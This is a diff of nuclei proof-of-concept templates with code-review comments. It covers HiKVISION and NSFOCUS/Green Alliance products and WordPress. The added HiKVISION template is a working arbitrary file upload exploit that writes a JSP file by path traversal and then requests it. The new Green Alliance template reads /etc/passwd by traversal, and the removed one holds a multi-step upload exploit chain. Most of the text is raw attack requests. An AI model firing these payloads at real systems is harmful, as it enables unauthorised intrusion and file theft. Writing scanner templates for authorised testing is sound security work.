@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index a8f9cbe173..1cd783867f 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
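Review bot: The new check uploads `test.jsp` through a traversal filename into the eportal webapp and then fetches it, so every positive result leaves an executable file with a fixed name on the target; tag the template `intrusive` and add a comment such as `# NOTE: leaves test.jsp in the eportal webapp; remove after verification`. The env information-leak check that previously lived in this file is dropped here rather than moved, and its `medium` severity, `name` and matchers go with it; confirm that check survives elsewhere before merging. `id: HiKVISION` differs from `id: HIKVISION` at L77 only by case, which does not make a meaningful template identifier; a descriptive id such as `hikvision-ivms8700-report-upload` (constructed) would.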
@@ -1,59 +1,28 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - 
--4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "nologin" + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-debug-log.yaml b/poc/wordpress/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/wordpress/wp-debug-log.yaml +++ b/poc/wordpress/wp-debug-log.yaml 
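Review bot: The new `description` (`There is an arbitrary user login vulnerability ... local_ User. php enables any user to log in`) does not describe what the request checks: the path sends a traversal to `/webconf/GetFile/index?path=...` and matches `nologin`, which is the arbitrary file read the new `name` announces. The description should be rewritten to match the check, e.g. `The GetFile interface of the Green Alliance SAS fortress machine does not appear to restrict the path parameter, allowing server files to be read.` The file name `Nsfocus_NF_Firewall_FileUpload.yaml` and `id: Green-Alliance` also no longer match the content, and the diffstat shows `poc/other/Nsfocus_sas_getFile_read.yaml` touched in the same commit, so this looks like a duplicate rather than a rename.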
@@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml b/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml new file mode 100644 index 0000000000..ca2e57a547 --- /dev/null +++ b/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml 
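Review bot: The rewritten template uses the legacy `requests:` key while the other templates in this commit use `http:` (for example the new wp-responsive-video-gallery-with-lightbox file); nuclei still accepts `requests:` but it is the deprecated spelling, so `http:` keeps the repository consistent. The commit also drops the description entirely, leaving `info` with only name, author, severity and tags; a one-line `description: The WordPress debug.log file is publicly readable and may expose file paths, queries and error details.` would keep the finding self-explanatory. Note also that the retained regex opens with an unescaped `[`, so `[[0-9]{2}` is parsed as a character class containing `[` and digits rather than a literal bracket; it still matches log lines by starting at the digits, but `\\[[0-9]{2}` would state the intent.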
@@ -0,0 +1,59 @@
+id: wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375
+
+info:
+ name: >
+ video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/"
+ google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-responsive-video-gallery-with-lightbox"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.6')
\ No newline at end of file
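Review bot: `description: >` is empty and `cvss-metrics`, `cvss-score` and `cve-id` are all blank while `tags` includes `cve`, so the template claims a CVE classification it does not carry; either fill those fields from the referenced Wordfence entry or drop `cve` from the tags. The check only reads `Stable tag` from the plugin's readme.txt and compares it with `<= 1.0.6`, so the description should say this is a version fingerprint rather than a test of the injection, and that patched-in-place installs or a stale readme can produce false results, e.g. `Version-based detection from readme.txt; does not exercise the vulnerable query.` `shodan-query: 'vuln:'` looks like an unfilled placeholder and should be removed rather than shipped empty.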